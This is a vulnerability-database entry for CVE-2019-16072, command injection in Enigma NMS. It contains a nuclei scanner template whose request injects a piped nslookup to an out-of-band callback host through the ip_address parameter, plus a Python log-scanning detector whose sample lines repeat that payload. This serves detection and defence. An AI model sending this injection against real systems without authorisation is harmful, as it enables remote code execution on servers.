Enigma NMS < 65.0.0 - Authenticated OS Command Injection

22 Jun 2026 05:20:07 | Reported by ProjectDiscovery | Type: nuclei | Link: github.com | 22 views

Authenticated OS command injection in Enigma NMS prior to 65.0.0 via ip_address in discover_and_manage.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| 0day.today | Enigma NMS 65.0.0 - OS Command Injection Exploit | 9 Sep 2019 00:00 | zdt |
| Circl | CVE-2019-16072 | 19 Oct 2025 23:53 | circl |
| Check Point Advisories | Netsas Enigma Network Management Solution Remote Code Execution (CVE-2019-16072) | 10 Sep 2020 00:00 | checkpoint_advisories |
| CVE | CVE-2019-16072 | 19 Mar 2020 23:06 | cve |
| Cvelist | CVE-2019-16072 | 19 Mar 2020 23:06 | cvelist |
| Exploit DB | Enigma NMS 65.0.0 - OS Command Injection | 9 Sep 2019 00:00 | exploitdb |
| exploitpack | Enigma NMS 65.0.0 - OS Command Injection | 9 Sep 2019 00:00 | exploitpack |
| NVD | CVE-2019-16072 | 20 Mar 2020 00:17 | nvd |
| Packet Storm | Enigma NMS 65.0.0 OS Command Injection | 9 Sep 2019 00:00 | packetstorm |
| Prion | Command injection | 20 Mar 2020 00:17 | prion |

id: CVE-2019-16072

info:
  name: Enigma NMS < 65.0.0 - Authenticated OS Command Injection
  author: 0x_Akoko
  severity: critical
  description: |
    An OS command injection vulnerability in the discover_and_manage CGI script in NETSAS Enigma NMS 65.0.0 and prior allows an authenticated attacker to execute arbitrary code because of improper neutralization of shell metacharacters in the ip_address variable within an snmp_browser action.
  impact: |
    Attackers can execute arbitrary code on the server, potentially leading to full system compromise.
  remediation: |
    Update to the latest version of NETSAS Enigma NMS or apply security patches that fix input sanitization.
  reference:
    - https://www.exploit-db.com/exploits/47202
    - https://nvd.nist.gov/vuln/detail/CVE-2019-16072
    - https://web.archive.org/web/20201220124431/https://www.mogozobo.com/?p=3647
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-16072
    cwe-id: CWE-78
    epss-score: 0.25279
    epss-percentile: 0.97667
    cpe: cpe:2.3:a:netsas:enigma_network_management_solution:*:*:*:*:*:*:*:*
  metadata:
    verified: false
    max-request: 2
    vendor: netsas
    product: enigma_network_management_solution
  tags: cve,cve2019,authenticated,enigma,nms,oast,oob,vkev

flow: http(1) && http(2)

variables:
  username: "{{username}}"
  password: "{{password}}"

http:
  - raw:
      - |
        GET /cgi-bin/protected/main.cgi HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: response
        words:
          - "ENIGMA NMS"
        internal: true

  - raw:
      - |
        GET /cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|nslookup+{{interactsh-url}}&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1 HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(body), "snmp") || status_code == 200'
          - 'contains(interactsh_protocol, "dns")'
        condition: and
# digest: 4b0a00483046022100810cb3aa5c246b509522103151744b405fab7bda808c37c9e8a024dc44031f74022100af1434c566412a2fea497be92ad6444fc77e08a870db766a94254a267426b2f1:922c64590222798bb761d5b6d8e72950
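
A defender-side check for the request shape this template sends, as an added example (not part of the template or of this page): it scans web access logs for snmp_browser requests to discover_and_manage.cgi whose ip_address value contains shell metacharacters, including percent-encoded ones. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Characters a shell treats as operators, substitution or redirection.
SHELL_META = re.compile(r"[|;&`$()<>\r\n]")
# Request field of a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
TARGET = "/cgi-bin/protected/discover_and_manage.cgi"

def suspicious_ip_address(line):
    """Return the decoded ip_address value when the line is an snmp_browser
    request whose ip_address carries shell metacharacters, else None."""
    match = REQUEST.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if url.path != TARGET:
        return None
    # parse_qs percent-decodes and maps '+' to a space, as a CGI parser would.
    params = parse_qs(url.query, keep_blank_values=True)
    if params.get("action", [""])[0] != "snmp_browser":
        return None
    for value in params.get("ip_address", []):
        if SHELL_META.search(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        value = suspicious_ip_address(line)
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample log lines (documentation addresses, placeholder domain).
SAMPLE_LOG = [
    '192.0.2.10 - admin [09/Sep/2019:10:00:01 +0000] "GET /cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&ip_address=198.51.100.7&snmp_ro_string=public&snmp_version=1 HTTP/1.1" 200 5120',
    '192.0.2.66 - admin [09/Sep/2019:10:00:09 +0000] "GET /cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&ip_address=|nslookup+oast.example.invalid&snmp_ro_string=public&snmp_version=1 HTTP/1.1" 200 912',
    '192.0.2.66 - admin [09/Sep/2019:10:00:15 +0000] "GET /cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&ip_address=%7Cnslookup+oast.example.invalid HTTP/1.1" 200 912',
    '192.0.2.10 - admin [09/Sep/2019:10:01:00 +0000] "GET /cgi-bin/protected/main.cgi HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: ip_address={value!r}")
```
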

04 Feb 2026 07:00 (Current)
Vulners AI Score: 7.7 (High risk)
CVSS 3.1: 9.8
CVSS 2: 10
EPSS: 0.25279